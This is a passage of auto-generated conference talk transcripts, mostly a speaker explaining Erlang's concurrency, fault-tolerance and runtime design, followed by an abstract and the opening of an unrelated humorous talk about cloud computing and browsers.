right-hand side, I'm building one. If I'm using it as a pattern, I'm actually testing and pulling something apart. So yeah, you can do this and see. But compare how much code that is compared to writing it in C. And the system does it for you. And it actually does it very efficiently as well. So yes. I just like that one. That's, it's a very nice example of using binaries. So at the same time, we're talking about very high-level language. We're talking about language which has very nice primitives for looking at the low level as well. So you'll find some people using our language so they can get at this easy way of building and pulling apart packets of data that come in. We're going to include the TCP packet. That's much simpler as well so it's not really, it gets there. So using our language to look at protocols is much easier. Another feature is we don't do defensive programming. Right? We just don't. We try to avoid it anyway. You write your program for the, for the case that everything works. If something goes wrong, you generate an exception. We let the system generate an exception for you to crash things. That's it. It's, it takes a bit of getting used to. You're used to trying to always detect errors and handle errors. We don't. We'll say, yeah, this works. We'll just do everything as if it works. If something goes wrong, we'll crash the process. We'll see later how we handle that. That makes a lot of code much easier. If there's anyone, if you've ever written code which does serious error, error handling, that's a lot of effort. There's a lot of code to do it. We can avoid most of that to straight off. Concurrency. This is a quote from Mike Williams, who is the third person in the original team. It was Joe, it was Mike, it was me who did most of the original work around our language. Now the people came in to the other nice features as well. And you need, if you want to make an efficient concurrent language, you need three things that have to go fast. Right? It has to be fast to create processes. Processes are going to come and go all the time. It has to be fast to create processes. You have a lot of processes. There's going to be a lot of context switching. So context switching has to be fast. And also communication between the processes has to be fast. So if you're going to build a system which uses processes, concurrency in this form, these three things have to be fast. Otherwise, it's not practical. So where do we end up on the concurrency bit? Lightweight processes, yes. So tens of thousands of processes, easy, hundreds of thousands. Now it's getting interesting. Millions of processes perfectly feasible to do. And they're actually products running that have millions of our long processes in the system. So we're not talking operating system processes here. We're doing, we're implementing our own processes inside the operating system for it. The operating system processes are just too heavy, both too big and too heavy, and everything like this just doesn't work. Well, it works, but it wouldn't be practical. We use processes for everything in our like, not just a model concurrency. We're using for managing state because that gets down to the bottom one here. There is no global data in the system. If you want state somewhere, you generally have a process managing that state. Even if your state might be an external database, you will have a process that talks that database and manages that. So there's a lot of processes there. Processes are isolated. This is in the sense that the only way to communicate between processes by sending messages, I cannot go and look in the data of another process and I cannot go modify, especially I cannot go modify the data of another process. That's it. That means that when a process crashes or terminates, it will not affect anyone else. We won't get things like bad data in the system or something like this. So the only way of communicating between processes is by sending messages. So we have that. And again here, we provide the basics, the low level basics. It's a simple asynchronous message passing facility we have, features we have for it. You have a process. I can send a message to it. That's an asynchronous send. Then at the other end, we have a selective receive which allows a process to get at the messages that have been sent to it. This idea of a selective receive is very nice because it definitely limits the combinatorial explosion you can get in non-deterministic systems because you can never really be certain who is going to send us what and when. So if I didn't have this facility, I might end up having to be able to handle every message that could be sent to me everywhere, which is not what you want to do. Selective receive here allows us to be very selective what I'm interested in now and ignore everything else for the time being. And using these mechanisms, these very simple mechanisms, you can build more complex message handling constructs on top. So when you want, say, synchronous messages, synchronous communication, it's two messages. You send a message to the server and then you sit and wait for reply. It does something, then sends a reply message back. That's easy. It's nice. Well, why not include that in the system from the start? The trouble is it's very simple until you have to actually start handling errors and working out what happens when things go wrong, right? So I send a message to another process. I don't get a reply back. What should I do? Type the thing. Should I time out? Should I try and detect if that process has died or something like this? Well, all those solutions are nice, but you'll want different solutions different times. So by providing the low level mechanisms, you can actually go in and you can program exactly how you want this communication if you want synchronous communication to work. So what type of code will we looking at? This is the second code example here. This is not real code. Well, it's real code in the sense that it actually ran, but it's not product code. So this is from a small telecom system we were running in the lab and the teleOS there when we're communicating with that, that actually could talk to our small switch I showed in the railway diagram picture and you could control telephones on that and you could ring things through that as well. Or also it could either be a graphical interface as well. So what we've got here is that A is calling B and the telephone is ringing and we have two processes here. So there's an A side which is doing the ringing A side call there and there's a B side which is doing the ringing B side. And these processes are just sitting waiting for messages to come in. And all this is asynchronous. It has to be because other people might try and call us. If other people try and call us, we have to say, no, we're busy. We can't not handle it right. So that's what the case down the second bottom case in both sides is. Sides is someone sends us a message sees. So if we get a message sees, the PID there, that's the process identifier of the process trying to call us and we just send back the message rejected. No, you can't call us now, we're busy. And then we go into a recursive call there and sit and wait for the next message. So both sides, they just sit and wait for messages. The same thing on the B side. If the B side gets a C, it replies rejected and calls itself recursively and sits and waits for the next message. Now what happens if someone answers? So the B side goes off hook. Okay, we stop the dial tone, we send to the A side answered, we're applied and we go into a speech mode. The A side is now going to get an answer. So it's going to stop its tone and it's going to tell the switch to connect A and B together and it'll go into a speech as well. Sit and wait for its sides. But both of these processes are running asynchronously on either side. If A side goes on hook, it sends cleared to B side, stops the tone and goes back to idle and the B side gets it cleared so it stops the ringing and goes to idle again. So you've got these things running, they're completely asynchronous running between them. And then while I said this code actually worked but it's not production code. Production code will have a lot more stuff in you can do and the system needs to be done. But the basics are exactly the same. And you see here the basics that we're putting up, starting a lot of processes in the system. So typically you'd have at least one process per connection even when it's not doing things. Then you start up new processes when calls are made. This also modeled quite well the definition of the systems or descriptions of how, specifications of how the system should work. I don't think they didn't talk processes but they were talking state machines and inputs and events coming in and actions that we've been done and other events being sent out as well too. This modeled that very well. So the error handling. Okay. The basic premise here is errors will always occur. You're always going to get errors in the system except get over it and work with it. They might be programming errors, they might be hardware errors, you might just get garbage input or something like this from the outside world. The classical telecoms cases is that some road works dig up the telephone lines and you get a deluge of inputs coming in which mostly be junk. So yeah. So what do we do? Well the second basic premise of this is that the system must never go down. So we're going to accept the fact errors are going to occur. We're even going to allow, you might actually lose a couple of calls if we're say running and you might be losing connections but the system as a whole should always be able to survive. That's just, that's not an option. Yeah. So parts may crash and burn but the system must never go down. And that means your error handling mechanisms, you need to be able to detect errors. That's one thing of course. You need to be able to contain them to make sure that the effect of the error doesn't spread in an uncontrolled way. You need to be able to handle errors and need to be able to recover from errors. Things are going to crash in the system. How do I make the system in such a way it will keep on going and keep still, still keep working. And again the mechanism is very simple. It's based on a concept called links. So I can link between, I can set up a link between processes. And all that happens is with a link. It doesn't affect communication or anything. What happens is that with one process crashes, dies, terminates, whatever you want to call it, it sends an exit signal to all the processes it's linked to. It's basically saying I'm dying. What the signal says. And if that signal comes from a crash process, the process which receives that signal, it will crash as well. And it will send exit signals out. It will in turn generate exit signals. So if I've got a group of processes that are linked together and one of them crashes, they all crash. Which is fine. Because I'm assuming they're working together. If one dies, it's not reasonable for them to continue. They'll all go down. Because I want to monitor these processes. I want to detect when something crashes. And I can't link to it because then I die. So there's a feature called you can trap exits. So if I'm trapping exits, I'm linked to another process. I get an exit signal from it. I don't die. I see that as a message in my message queue and I can just do a receive and look at it. Which allows me to monitor other processes in the system. Therefore, I can build fault tolerance systems like this. That is the basic mechanism. Literally, that's it. And what always surprises me is how simple it is and actually works. It does. How can you build systems that run for a long time using these mechanisms? So what do you need to build a robust system? Well, you need a couple of things. Well, at least a couple of things. And two things you need to ensure is that some functionality always survives. Always is available. If that functionality is not there, the system is not running. So that's something that needs to be done. The other thing is when things crash, you need to be able to clean up after it. The thing that crashed might have allocated resources or set things or whatever it might be. I have to be able to clean up afterwards so the system can keep on going. Well, you need at least two machines, of course, for distribution. Now, to handle the first one, we have a concept called supervision trees. So you divide processes into two groups, workers and supervisors. And you build something called a supervision tree. And supervisors, they start their children and they monitor their children. Yes, it's a convention. It's a convention of doing this. It can be implemented different ways, but it is a convention. So in the actual system, at the ALANG level, processes are all equal. There's no process hierarchy or like this. All processes are equal. It's a very egalitarian system, to be honest. We'll see that with code as well, too. There are no special code modules or anything like this. All code is equal. All processes are equal. So we build this on top of the process structure. And this means that the supervisors, they just monitor their children and they know what to do when a child dies. Restart it. Well, maybe ignore it. Maybe this child, it's okay if this child dies. Or maybe it depends on how the child dies. If it exits normally, we can just leave it. If it crashes, we restart it. For example, maybe they decide if one child dies, I'll have to kill off all my other children and restart them all. Yeah, we kill a lot of children here. I couldn't make the we killed our children T-shirt, I'm afraid, but that wouldn't have been accepted, yes. We also, in this case, we also kill our parents and our siblings as well, too. We're pretty... So, yeah. That's the basic mechanism for it. You can control in by your supervisors how they're to handle their children dying. Another way, for example, maybe if my children are dying too often, something is seriously wrong and I should give up. So I kill off all the rest, then I die, and I pass the buck up to my supervisor who then decides if to retry again, et cetera, et cetera. You can build these things. Typical case, you get a bad error in a serve, which means it just keeps crashing the whole time and it's not fixable. Actually, this is quite surprising. I always just said this is a very simple mechanism implemented using links and trapping exits. So supervisors link to their children, they trap exits to get exit signals from them. And it's very funny, former colleague, Joran Borgia, he was working for a company. They were building mobile products. I think they were selling them to Russia or something like this. And they had a product that worked and everyone was happy until someone went out and looked in the error log and they found the system was crashing all the time. But it was being restarted the whole time, so they didn't notice that the system was going down. So servers in the system were crashing, they were being restarted, and everything just kept on going, right? Which, of course, is what you want, but yeah, it doesn't feel right. So that's one thing we're doing here. We're just keeping track of processes and restarting them after certain rules when they die. This is just to ensure that functionality is there, right? The other case is cleaning up. If a process crashes, it might have allocated resources. How do I reset those and restore those resources? Typically, you'll have a server which is managing the resource. It will typically link to its clients. And if a client crashes before it's managed to free the resource or reset or whatever it might be, the server will detect this and it can clean up after the client and fix things like that. And the processes will use the same mechanism for monitoring their coworkers. As I said, you better have a set of processes that are linked together. If one dies, they all die. That's what you want to do. As I'm still surprised it works. Well, not that it works, but it's actually as useful as it is actually. We've got two things. We've got links and trapping exits. That's it. That's what you use. The communication, what do you got? You've got simple starting processes, sending messages and selective receipts. That's it. That is the Allington currency model. And yeah, it works. I'm very surprised about that. Well, we tried pipes. Pipes. Yeah, we tried pipes. We tried a lot of different mechanisms we thought would be useful. What? This is what left. This is because it worked, I guess. And with this, with these mechanisms, you can build anything else you want on top of it. So if I want a complex synchronous communication mechanism, which I occasionally do, right, you can build this on top of the asynchronous, the handling of links and detecting when processes die, et cetera, et cetera, et cetera. I can build that. I can build my specific case just there. I don't have to make a general tool which can handle anything anyone might be able to think up and dream up. Yes? In what sense? The question was about the call stack. Yeah. Yeah. Yes, there is a call stack. Okay. So Alang does what most, well, I'll say a large portion of other functional languages do. They detect the tail call. So the last call basically is transformed by the compiler into jump. If we step back here, when we're doing the recursive call to ringing A side here, the compiler says, oh, this is a tail call. This is the last call. I will basically clean up the stack and jump back again. So I'm actually sitting doing a loop here. What's nice about this case is I'm not just, it won't just handle the recursive case, handles every case. So when I call idle, for example, I'm also making a jump there. So I'm sort of looping around a big collection of states here. That's pretty common fare for it. And otherwise it wouldn't work. Okay. Otherwise, yes, you crash the system. It also means if you get it wrong, you'll crash your process eventually because your stack will run out. So yeah, that was that. Code handling. Okay. So you need to be able to handle code while the system's running and upgrade code dynamically. And well, it's simple here. The module is the unit of all code handling. So code comes in modules. You load modules. You delete modules, you upgrade modules, et cetera. You work on modules. That's easy. And how the outlaying system works is that you're allowed to have two versions in the system of every module, the current version and the old version. In the system at the same time and you have processes running either of them. That allows you to do control takeover. So I can have processes running the old version. I can load in a new version of the code and I can tell them in which, when and how they're going to migrate to the new version of the code. And for that to happen, to be able to do that, you need the last point. You need a very well-defined behavior with respect to code. So when I call a function, I have to know which version of code am I going to get. Do I get the same one I'm in now? Do I get the new one? With that, then you can build systems on top that can handle upgrade of code on the fly. Because of this. I mean, a lot of other languages have the possibility of loading code while the system is running, but often they don't describe what happens when you do that. What happens if I reload a function that I'm actually running in at the moment? Is it going to crash or not? Will I get new code or whatever it might be? In our language, it's very well-defined exactly what's going to happen, which means you can build systems that do not have a code upgrade. So that's, they're the basic mechanisms. The sequential language, simple functional language, we've got the concurrency with processes, message passing, we have the error handling with links and exit signals. And the code handling as well. I'm not going to go into OTP, but it's there. It's the open telecom platform. It's a set of design patterns for building concurrent fault tolerance systems. I've got these tools. How do I use them? So it's a design patterns for doing that. It's a set of libraries that help you do this, that provide code and support for doing these things. And also set of tools, which allow you to build systems and make releases of these systems based on these principles. Okay. Again, it's a library. If you don't want to do it, you can do it yourself. Sometimes OTP fits like a glove. You will use it. Sometimes it just doesn't and sometimes you just want to mix. You can do all those three cases. The whole OTP is actually written in our language. There's nothing strange going on there in that sense. There is one important thing to remember here. It's absolutely nothing about telecoms in OTP. So yes, it's called the open telecom platform, but that was just a politically correct name inside a telecom company, right? And it opens always good. Calling something open is fantastic. It doesn't mean anything, but it's a very good thing. So it's telecom. It might be a platform, but there's nothing about telecoms and OTP. So what I'm just meaning here is that if you're interested in allowing and you see it's telecoms, that does not mean it's locked into telecoms. The closest you can say is building these type of applications. Yeah. I want to do one thing here. I don't really have to say this. Think OS. So when you're working with Alling, the Alling system was designed for and how you work with it. It's not like a language with a library. You build something and you call a function that does something. You have the Alling system running and you plug your, you put your code into it. It's very much like an operating system. In a normal operating system, even if you're Linux or Windows, you have a number of processes. You might start your own processes in the system running, doing your stuff. They'll be communicating. They might be communicating with other systems, but they're part of the whole system. It's the same thing with working with Alling, right? When you start up the Alling system, there is a running system. It's like an operating system running there and you can start your processes doing their work and things like this in the system itself. All the functionality is designed to work in that way. So when we were developing the system, we were thinking very operating system-like in the way it works, which means it's quite funny. I've been listening to, well, yesterday or to various other presentations here about handling concurrency and things like this and asynchronous and things like that. There you see it. They're working on a standard sequential base and they're trying to build this stuff on top of it. From our point of view, that's completely wrong. You put the base, you put the concurrency, the operating system level, the concurrency level at the low level, then you'll build your things on top of it, which means all these things about how do I design asynchronous communication? It's trivial, right? It's there. I don't have to do anything special to do it. I don't have to build a library on top to try and do it and try and make so I can have things together with parallelization and synchronization, et cetera. It's just there, right? That's where you want it. That's where you want it at the base level, not a library on top. Yeah, I'll say. Yeah, I was thinking of listening to, I can't remember the one on asynchronous. I can't remember who gave it yesterday. He was presenting a language called RQ where you could do things in sequential and things in parallel and stuff like that. That actually looked very much like a language I did for my train set because you wanted to design, define a program for how trains should move. So you wanted to do things in sequential. It should go there to there to there and something else will work in parallel. So it was actually the same type of thing. Sorry, that's just again, that was putting on top of it. So yeah, the howling system is very operating system like when you run it. That's how you should think about things. And that's the place to solve problems with concurrency, with parallelism, asynchronous events, anything like that. Not as a library on top. Then it gets all messy at the base level. So yeah, this works. It's fine, right? But well, the brave new world, how does this affect other things? And I think the main thing to look at here is to realize when we go back to this list of properties of telecom systems, at least as they were then, you look at it, most of those is nothing to do with telecoms. I want to have lots of very large numbers of concurrent activities. Great. I'm writing a server for my website and I want to be able to have 100,000 connections at the same time. That's that. I want fault tolerance. My site should not go down, etc., and most of those things you'll find are equally valid for a lot of systems today. I would say our difference was because we were trying to solve this problem, that's why we got to the stage where we are. We didn't have a language, we were trying to make a library on top to solve the problem. We designed the language and the system to solve this problem. And what happened now is that more people have realized that this is the problem. This is not a telecoms problem, this is a much more general problem. I want these things. Of course I don't want my site to crash. If my site crashes, I'm not making money. I want to handle lots of connections, of course. Same thing. All these types of things you want to do. I want to be able to maintenance while the site's running. Of course you can do like World of Warcraft and take it down at three o'clock on Wednesday morning, but why bother with it? Things like this for it. Okay, it's not controlling hard work. Well, unless you consider, say, IP channels as hardware, things like this. You've got timing issues. All these, most of these things are valid today and are desirable in systems. That is why our LANG is valid today because we're solving these type of problems. That's what we're doing. Another feature with that, the LANG can currency model scales. Having separate processes with message passing between the process scales. Sharing stuff does not scale. However you look at it, if you start sharing things, then you have to start synchronizing, locking and synchronizing, and that gets more costly the more sharing you're doing. Sending messages, it might sound like it's costly, but in the long run it actually saves you a lot. Saves you a lot of problems at the cash level. You have a lot of cash coherency problems. Keeping things in the cash which might be accessible from, say, different cores, that can become very costly. It might look cheap, but it can become very costly. Having separate copies actually can be much, much cheaper, much more efficient to it. So yeah, we'll do this. Yeah, just a little bit about the internals, about the LANG SMP goal, right? A bit about how it works internally, very shortly. So the goal is the SMP should be transparent to the programmer. When I'm designing my system, I should not have to worry about whether I'm running on four cores or eight cores or six cores or whatever, things like this. I might have to, I might want to, but I shouldn't have to. And the beam does this in a concept it calls schedulers. So when you start up the beam, you start up a number of schedulers. Okay? So it's running in one LANG virtual machine, one beam, one operating system process. You have a lot of these schedulers running. And each scheduler is a semi-autonomous beam virtual machine running LANG in it. It's only semi-autonomous, of course, because they'll be communicating with each other and cooperating with each other. They'll try and try and be as separate as possible. And generally you run one per thread. Use one, one scheduler per VM thread. And you have one thread per core running on these things. That's the default. And they try and run as separately as possible because you want to avoid synchronization. Synchronization costs, right? You want to avoid that. Okay. So what does this give me? Why can't I just set up, say, if I've got eight cores, start up eight node process or eight node JS processes and have them run, right? I get things like balancing of the system. The system balances these things for me automatically, right? Well, as one I forgot to mention here, there's a simple concept called process stealing. So if a scheduler has nothing to do, it will start looking at its neighbors and see if you find one with something in the process, in this run queue and steal the process and say, oh, no, I can work on this one. That's local level. At the top level, well, if someone will become a master eventually and it will start looking at all the things and try to, at a more global level, try to balance the workload over the schedulers. All this, the schedulers are still running. We're not stopping anything doing this. Everything's still running. We're just doing this type of level, global optimization for it. And yeah, this works because each scheduler has its own run queue. It also works the other way. So the load balancing tries to spread the load as evenly as possible over all the schedulers, over all the cores. It also goes the other way and says, yeah, I'm actually not using these. It will try and compact cores. It will say, I might have wanted to run eight cores, but I'm actually having so little load, I can do everything on three cores without any problem, and it will try and compact things, which means it can shut down cores, which means it can save energy. All this is built into the system. So you've got these two optimizations working against each other. One trying to spread it and the other trying to compact it. That works. You can control these things. You might want to say, I want to run a certain number of cores, et cetera. You might want to say, how hard should I try and spread things or compact things? I can control this. Each scheduler has a run queue. When processors are waiting for message, they're just suspended. There is no cost to the system to have processors sitting there waiting for messages. There is no run time polling. Everything's done. When a message arrives at the process, that process is then put on the run queue and when its turn comes, it can start looking at the message. So typically our long systems, you will have a lot of processors just sitting there waiting. They'll receive a message, they'll do something, they'll send some other message, then they'll go sit and wait for the next message and suspend. So yeah. There's a preemptive scheduler as well. So after 2000 reduction or 2000 function calls, a process is rescheduled, which means that no running process can block the system. Again, that gets back to the problem. The problem in the telecoms, the system can't block. So just because someone's doing a lot of work doesn't mean that everything else should block in the system. So we have a preemptive scheduler to do that. None of the system blocks. Process memory, each process has a separate heap. All processed data is local to that process heap. Sending messages means copying data from one process heap to another process heap. This is actually not required by our link, but this is an implementation detail. But then of course you get the question, isn't all this copying terribly inefficient? Every time I send a message, I'm copying data backwards and forwards all the time. And well, yeah, sort of. It's inefficient, maybe. But there's a big button. Having separate process heaps has a lot of important benefits. When you actually start looking into the implementation of it and looking at how things work, it does right. The simplest one is it allows us to garbage collect each process separately. So I can just garbage click one process. I don't have to worry about links between other processes and things like this for. That means I don't have synchronization. When I'm garbage collecting, I don't have to synchronize between processes. I don't have to synchronize the whole heap. And that is an enormous win. It's even bigger than big win, right? It's an enormous win. Once you start having to synchronize access into memory, everything gets slower. If you look at, for example, the amount of effort they put into the JVM to make garbage collectors that can run on multi-cores, and they still have synchronization problems there, you can see how it is. Yes, you can buy a product that doesn't. But yes, it's not easy. The garbage collecting itself becomes more efficient. I don't have to do a real-time collector. I can actually just do a stop on garbage collector each process. That will be so fast, I won't notice it. It becomes more efficient, becomes simpler. Simplifying garbage collections is a big win. I've sort of been, garbage collection, bugs in the garbage collector are a real bastard to find, right? Because you won't see them until a few garbage collects later when someone references data somewhere wrong. It's almost impossible. It means you can make better garbage collectors more efficient algorithms. And again, as I mentioned, cache coherency and pneumotype architectures. You can do these things. Just a bit about the internals. Now, we're nearing the end here. So what I'm going to say is, allowing is not good for everything. If someone tells you allowing is good for everything, they either don't know what they're talking about or they're lying. Just accept it. It's not. It's good for some types of applications. But it's also very good for interfacing with other things. So you'll typically see in a lot of, maybe not most, but a lot of allowing applications, allowing is used together with other languages, doing their bit. We tend to say use allowing as some form of concurrent glue to put things together. It's like this in the Ericsson products. They'll use allowing at the logic and control level, and then they might have specialized hardware for doing signal processing. But the allowing controls that, right? That's fine. That's sort of perfect. I think we might have had this idea from day one, but pretty soon we realized that that was the way it is. And I think that maps very well. If you look at large systems, large applications, you will find that most large applications have different requirements in different parts of the system. So therefore, why try and use one language for everything when most, well, when no language is good at everything? Yes, you can program things in any language. That's not the problem. But it's good for it. Is it suitable for it? Allowing is suitable for one type of application. Use it for that. If you want something else in the system, say if you want number crunching in. Yeah, you can do arithmetic in Allowing. It's not very fast. It might be better to get some libraries in Fortran or C or something like that and then call them from the Allowing system to do all the work. Fine. Or if you're doing signal processing. So, yeah. Yeah, then that would just, last bit, just say how good we are. Okay. Is it just a diagram of some, not everyone, of some companies actually using Allowing seriously in products? So it is spread. I think we lost, we went, we became uncool about 2008, something like this, right? We were cool for a while about 2007, 2008. We're not cool anymore, but we're actually being used, which is very nice. So we're in the class of languages, Mr. Hruthrup said there were two types of languages. Those people complain about and those no one uses. We're in the class that people complain about. We're actually being used. Some of these are quite fun. WhatsApp, of course. They actually, they're running two million TCP connections on one machine on running one Allowing system. That's a lot of Allowing process. That's impressive. That, talking to one of the guys there said they actually peaked at three million or something like this. TCP connections on one machine running Allowing. Yeah. Bet365. They're a British online betting company. Yeah. Sorry. Yes? Okay. Give me the name and I'll put on my list. Yeah. They're a lot of, if you look through these, they're very different type of companies. I mean, Bet365 does online betting. I mean, they're definitely in for the money. They're using Allowing. Not the whole system, but part of their system. So if you go onto their site and you're looking at online games and getting online odds, dynamically getting odds while you're looking at the games, Allowing is distributing those odds. You've got Clona, yeah. Basho, they make React, which is almost completely written in Allowing. And things like this. You've got other stuff up there. You've got gaming companies as well and things like that. So we are actually being used. Well, there are a couple of common tools that are based on Allowing, actually. So the Couch2B is written in Allowing. Partially written Allowing varies depending on which one you use. React, of course, as I mentioned, RabbitMQ and EJABD are implemented in Allowing. Now I say most of the users of these systems don't care. They don't know it's written in Allowing. If they know it's, they just don't care because all these have interfaces for other types of languages as well. But they are implemented in Allowing. I saw somewhere even NASA was using Rabbit. Not in space, but, well, that's my goal. That's my goal. But anyway, yeah. So we are actually being used and we use a lot of places where no one cares it's Allowing. It's just a useful tool. For example, Rabbit and EJABD. So, yeah. Almost bang on time. That's it. That's me. So, yeah. Questions first. More questions. We had some. More questions. Yes? Is it appropriate for massive parallelism, sort of, map-reduced crunching problems? Are you talking distributed in this sense? So the question was if it's suitable for massive map-reduced type problems. The distribute, yes and no. What? Yeah. There's a bit of problem with distributed Allowing when you're running many nodes. Natalia will talk about that more tomorrow for actually talk about solutions for that. So, yeah. A lot of the things were designed back in the old days when you had the two processes were a lot. So, yes, it is. In principle, you might need some detail for it. So, can I handle concurrency? Yes. Any more questions? Yeah. Sorry. Have you been following along with the development of running Erlang directly on hardware inside of Zen or something equivalent of that? And if so, what are your thoughts on that since it is very similar to OS? Yeah. I know of it. I really looked into it. I know of it. It was secret until recently. Yeah. What that is, it's Allowing on Zen. They're actually running the Beam. It is a standard Beam. They just sort of chopped off the bottom bit and put stuff in to take the place of the operating system. So, yeah. I have absolutely no idea if that's a sensible use at all of the application as a whole. But, yes, there's nothing strange about that. In one sense, if you look in how the Allowing uses the operating system in many ways is quite basic, really. It does a lot of the work itself. For example, the memory management. It does its own memory management. It does a malloc occasionally to get memory from the operating system, then it handles itself because it has to do the things in parallel between the schedulers. If you just do malloc and free all the time, yes, the system will be thread safe, but it's costly thread safe. Yeah. Yeah. Yes. You should be able to shut down in a couple of milliseconds too. I don't. We'll take this machine and fine it, but it just takes about half a minute or a minute to shut down. Right. And it takes about a long time to start up with. Yes. Yeah. I quite agree. Why? Yeah. Yes. Yes. Yeah. So, it's there. One sense is probably not that surprising because the Allowing makes quite little use of the operating system. Yeah. So, any more questions? We'll stand. Okay. Yes.
Erlang was designed around a set of requirements for telecom systems. They were distributed, massively concurrent systems which had to scale with demand, be capable of handling massive peak loads and never fail. Erlang's features make it perfect for multi-core computers, although it pre-dates them, and for the Internet Age and the Cloud although it pre-dates them as well. This talk will describe how Erlang was developed as a language and system to solve that could solve these problems. It truly demonstrates the benefits of concurrency–oriented programming.
10.5446/50634 (DOI)
if they're legitimate or not. I think Abraham Lincoln said that. And so, since I don't know who this is, but I do have this really old book, so we'll just say that that's the guy. And I'll be making up quotes throughout the whole day. That actually happened, right? You know, there's the Azure cloud and the Amazon cloud and the Google cloud. There's five computers. They just happen to be clouds, computers. Here's a picture of the Azure cloud. Now, you know, we're a little behind. We just got color. But we're getting there, right? We're loading up new machines in the Azure cloud every day. So pretty soon we'll catch up with the bookstore. So on the cloud side, we've got some really interesting stuff. And since this gentleman was an older guy who understood hardware but didn't understand the web, I wanted to explain it to him in a way he understood. And I said, well, imagine what they taught us about operating systems in school, that the operating system has these characteristics like memory management and networking, and it sits on top of this hardware. And he's like, yep, I totally get that. I did that work. And I said, well, now we can virtualize those, right? We can take those things and move them from place to place. And we can go from my data center to the cloud and from the cloud to someone else's data center. And he's like, yep, I love that. That's totally great. And I said, yeah, and you can do anything now. You can run Linux and Azure. And that's cool, even if you want to do that. I don't know if you want to do that. Maybe you could. And he thought that was amazing because he was used to building machines from scratch. And I was like, well, now you could just go up and say, I want to make that one. I want a Jenkins machine. I just have to type in two lines of code and drop that into a prompt and say, make a new virtual machine. And it's got ASCII art, which is awesome. And then boom, suddenly I've got infrastructure and a service. And I showed him some slides and he kind of understood that. But I had to explain to him the difference between infrastructure as a service, which is virtual machines where it's basically like, it's like a puppy. You have to feed it and water it. I don't have any pets, so I don't know how this works. But I, presumably you have to water the dog at some point. But the thing I don't like about virtual machines is that you have to be responsible for them, keep them alive. You have to run Windows update and all those kind of things. And Windows update is just a horrible situation because it always runs in the middle of me typing, you know, how you're typing, typing, typing, and then your hand is coming down just as Windows update is coming up and gravity is bringing your hand down. You can't stop it and you know it's coming and it's like restart, no. And you're like, no, but the world is in slow motion, your hand is coming. And nothing can stop a Windows machine from restarting. You know that, right? Once it's happened, there's effectively no way to get around it. Actually, there's one way. I don't know if you heard about this. The only way to stop a Windows machine from restarting is a dirty notepad. That right there, that will stop a Windows machine. So if it's going down and then you just quickly start, run notepad, enter dirty it, boom, and then you'll stop it. And the way that I, so I renamed notepad to just N. And that saves me a lot of notepads that I don't have to write later. So I recommend that you do that for all of your systems. Anytime a Windows is going to shut down, you can stop it. But I don't want to deal with virtual machines. It's a hassle. So I prefer to think about things like platform as a service. So rather than looking at it like this, I look at it like that. Virtual machines are like a house. I got to maintain it. I got to paint it. I got to clean the gutters. I like to trash my hotel room. Like my hotel room here that the conference bought for me. It's actually on fire right now. And that's like platform as a service. You know, I can just torch it and it gets cleaned up by some very nice person. I don't know. I've never seen them before. I know that they come in and they fix the thing up. And it's amazing and it makes me really, really happy. And I can go and scale that out, right? I can go and scale it out to multiple machines and that makes me happy. And I explain this to this gentleman. And remember, he's used to doing things the old-fashioned way, like physically buying the computers and plugging them in. And now it's just a slider bar. And this makes old people like myself very unhappy. Because there's like young people, like this young lady here, who probably when she scales out her web farm, she just scales it out. It's like, oh, this is taking like five minutes. Oh, the socks. And it used to take me like a week to scale out a system. But now I can just do it from the command line and just go scale out. And it just magically works. And when you ask someone, like, how did that work? They're like, what just happened? All you can say is, it's magic. It's magic. And I was explaining to this person that like, well, the cloud is great because the cloud doesn't care about what language you want. Because he's like, well, what should I learn? What language should I learn? Should I learn C-sharp? Should I learn Node? And I was like, no, man, pick whatever one you want. And he could not believe that. He's like, that's great. And he almost passed out. Good clouds don't care about language choice. Pick whatever you want. And it's all open source. You can have all sorts of fun. It's all in GitHub. I love that GIF. I wish I could have an animated GIF, like as the desktop and Windows. I would just have that guy all the time. So that's on the server side. You pick anything you want. You can scale out. You don't have to do any work. It's amazing. I said, but let's talk about the browser because that's really interesting. If we go back to looking at things like this, what's an operating system? What does it really mean to have an operating system? I had a couple of ideas around that. And I said, well, in the old days, you would sit down in front of a machine that looked like this. You type some stuff, but it really happened on a refrigerator that looked like this. And you would type something in and a user interface would come up. Uh-oh. There we go. And a user interface would come up, but it was really, it looked like it was there, but it was actually over on the refrigerator there. So this was really just a dumb terminal. That's how things worked originally. And then this happened. Tim Berners-Lee invented the Internet. And this is actually the first web page, first web page ever. And this is really great. This is at the original URL too. So this is the beginning of the Internet. You can go to that URL. It's still there. And actually interesting little side story about this. There's a guy at work named Heinrich. He's a peer of mine who works on the ASP.net team. And I met this guy and he's this, you know, he's a super cool European person like you guys. And, you know, he's thin and attractive and he's got like perfect hair and it's obnoxious. And his shoes are nice. I tried to wear my Euro jeans, by the way. It didn't work. And so then I meet the guy, hi, nice to meet you, Bob. And then he leaves. And then my buddy Phil says, you know who that was? I don't know. It's a guy named Heinrich. He invented HTTP. So I go and he has a Wikipedia page. So right there, that's the problem. So I go and I read the HTTP spec and it says right there, Heinrich Frisk Nielsen. And I'm like, oh man, did I say something wrong about it? So then I see the guy come by again and they go, hey, Heinrich. And he's like, hey, Scott. And I, what do you say, invented HTTP? What have I done? I got a blog. So I was like, good job on the internet. And then I had like a weird curtsy. I don't know what I did. I was just like, and I just kind of like, definitely visual basic. Definitely, definitely and if I can't even look Heinrich in the eye anymore. It's very, very uncomfortable. Turns out he was Tim Berners-Lee's intern. So while I was downloading animated gifts on AOL, he was inventing the internet. So yeah, I need to update my resume. So this happened, but it wasn't really an application platform, right? It was just pages up there. Look, the paparazzi are always following me around Europe. And then this happened. And how did we know that that happens? Because we were visiting web pages and everything was going along really quickly. And then Java loaded. And then that was a thing. And we had like a little island within this larger world. And then these guys were like, we can do it too. And then these guys were like, we've got YouTube. We're still relevant. But why were we doing that? Why did we do that? Because we really wanted a machine. We wanted an application platform. So we built this plug-in virtual machine inside of the browser. It was an operating system inside of this world. And it's a little bit uncomfortable because people and users don't really know what to do about that. In fact, I went to the Toyota dealership to have my oil changed recently. And I went in there and I like to see how their systems work. And usually they have like an AS400 and they'll terminal server into the back end, right? But I come in and he's got a whole new system. And I'm like, what's going on? You got a new system? And he's like, oh, we've replaced the whole system. It's much, much better than before. Let me show you. And he fires up XP. And he's like, and then he fires up Firefox and he loads a Java jar file. And it says, are you sure you want to use Java? And he's like, yes. And it's like, are you really, really sure you want to use Java? And he's like, yes. Sign your name, block, unblock all. And then he loads a jar file up and then loads a terminal emulator in Java and then terminals back to the same back end system. And then says it is way better than before. So we end up with these weird experiences where we've got this browser with a body and 